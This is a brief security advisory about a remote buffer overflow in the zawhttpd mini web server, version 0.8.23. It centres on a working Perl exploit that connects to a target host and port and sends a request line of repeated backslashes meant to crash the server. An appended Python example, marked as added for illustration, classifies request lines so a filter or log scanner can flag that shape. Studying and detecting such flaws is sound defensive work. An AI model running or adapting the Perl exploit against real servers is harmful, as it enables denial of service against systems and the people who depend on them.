Version: 0.8.23 (previous versions probably too)
Problem: Buffer Overflow
Discovered by: Kamil 'K3' Sienicki
zawhttpd is a mini Web server that features HTTP/1.0 and 1.1 support,
keep-alive persistent connections, IPv6 support, GET and HEAD requests,
chunked encoding and content-range, directory listing, basic
access logging, daemon mode, and more.
A remote user can supply specially crafted data which crashes the server.
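# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki
use IO::Socket;
# Show usage unless both host and port are given
if (@ARGV != 2) {
    print "perl zawhttpd.pl localhost 80 \n";
    exit 1;
}
my($socket) = "";
if($socket = IO::Socket::INET->new(
        PeerAddr => $ARGV[0],
        PeerPort => $ARGV[1],
        Proto => "TCP")) {
    # Send the malformed request line described above
    print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
    print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
    close($socket);
} else {
    print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}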
Kamil 'K3' Sienicki
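
Added example, not part of the original advisory or of zawhttpd: a request-line check that a front-end filter or log scanner could use to flag the request shape shown above (a target made of backslashes instead of a path). The function names and the sample lines are assumptions constructed for illustration.

```python
import re

# method SP request-target SP HTTP-version, as one raw request line
REQUEST_LINE = re.compile(rb"([A-Z]+) (\S+) HTTP/(\d\.\d)")

def classify_request_line(line: bytes) -> str:
    """Return 'ok', 'malformed' or 'suspicious-target' for one request line."""
    m = REQUEST_LINE.fullmatch(line.rstrip(b"\r\n"))
    if m is None:
        return "malformed"
    target = m.group(2)
    # A backslash is not a legal URI character (RFC 3986), so a target
    # containing one never comes from a conforming client.
    if b"\\" in target:
        return "suspicious-target"
    # Targets for GET/HEAD are origin-form ("/...") or absolute-form.
    if not target.startswith((b"/", b"http://", b"https://")):
        return "suspicious-target"
    return "ok"

def scan(lines):
    """Return (line_number, verdict) for every line that is not 'ok'."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_request_line(line)
        if verdict != "ok":
            hits.append((number, verdict))
    return hits

# Constructed sample request lines (not captured traffic).
SAMPLE = [
    b"GET /index.html HTTP/1.0\r\n",
    b"HEAD / HTTP/1.1\r\n",
    b"GET " + b"\\" * 10 + b" HTTP/1.0\r\n",  # request shape from this advisory
    b"GET /docs\\readme.txt HTTP/1.0\r\n",
    b"GET  HTTP/1.0\r\n",
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(number, verdict, SAMPLE[number - 1])
```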